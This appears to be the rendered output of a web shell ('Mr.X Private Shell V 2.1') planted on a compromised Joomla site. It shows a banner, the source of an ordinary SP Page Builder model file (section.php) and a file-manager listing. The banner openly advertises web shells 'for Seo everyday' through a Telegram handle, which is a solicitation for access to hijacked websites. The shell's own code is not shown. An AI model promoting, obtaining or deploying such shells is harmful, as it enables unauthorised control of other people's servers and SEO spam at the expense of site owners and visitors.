__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2023 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// No direct access
defined('_JEXEC') or die('Restricted access');
use Joomla\CMS\Factory;
use Joomla\CMS\Table\Table;
use Joomla\CMS\Language\Text;
use Joomla\String\StringHelper;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\CMS\MVC\Model\AdminModel;
if (!\class_exists('EditorUtils')) {
require_once __DIR__ . './../editor/helpers/EditorUtils.php';
}
class SppagebuilderModelSection extends AdminModel
{
public function __construct($config = array())
{
parent::__construct($config);
}
/**
* Method for getting a form.
*
* @param array $data Data for the form.
* @param bool $loadData True if the form is to load its own data (default case), false if not.
* @return void
*/
public function getForm($data = array(), $loadData = true)
{
}
public function getTable($name = 'Section', $prefix = 'SppagebuilderTable', $options = array())
{
return Table::getInstance($name, $prefix, $options);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| fields | Folder | 0775 |
|
|
| forms | Folder | 0775 |
|
|
| addon.php | File | 1.11 KB | 0664 |
|
| appconfig.php | File | 3.92 KB | 0664 |
|
| editor.php | File | 16.73 KB | 0664 |
|
| font.php | File | 5.88 KB | 0664 |
|
| icon.php | File | 6.03 KB | 0664 |
|
| media.php | File | 10.79 KB | 0664 |
|
| page.php | File | 11 KB | 0664 |
|
| pages.php | File | 5.99 KB | 0664 |
|
| section.php | File | 1.12 KB | 0664 |
|